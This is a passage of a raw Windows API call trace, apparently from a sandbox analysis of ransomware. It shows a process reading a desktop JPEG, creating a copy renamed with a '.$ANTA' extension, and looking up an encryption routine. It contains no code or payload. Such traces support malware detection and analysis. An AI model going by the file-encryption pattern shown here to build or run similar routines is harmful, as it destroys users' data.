hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0134.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0134.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0134.783] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0134.783] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0134.783] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0134.783] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0134.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eba98 [0134.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0134.784] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\phzrcch.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0134.784] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.784] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0134.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0134.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.785] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0134.785] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0134.785] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0134.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0134.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0134.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0134.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e298 [0134.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0134.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e298 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369e20 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0134.787] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0134.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0134.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0134.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0134.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0134.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0134.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0134.788] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\phzrcch.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0134.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0134.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0134.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0134.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0134.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0134.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.789] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0134.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0134.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0134.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0134.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0134.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0134.789] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0134.789] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0134.790] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0134.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0134.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0134.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0134.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0134.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b85020 [0134.795] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0134.795] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0134.798] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x32ca, lpOverlapped=0x0) returned 1 [0134.798] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0134.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0134.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0134.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0134.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ca) returned 0x49aa010 [0134.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b85020 | out: hHeap=0x1780000) returned 1 [0134.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0134.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0134.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0134.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0134.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ca) returned 0x49bd2e8 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.802] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x132ca) returned 0x49aa010 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.802] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0134.802] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0134.803] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0134.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 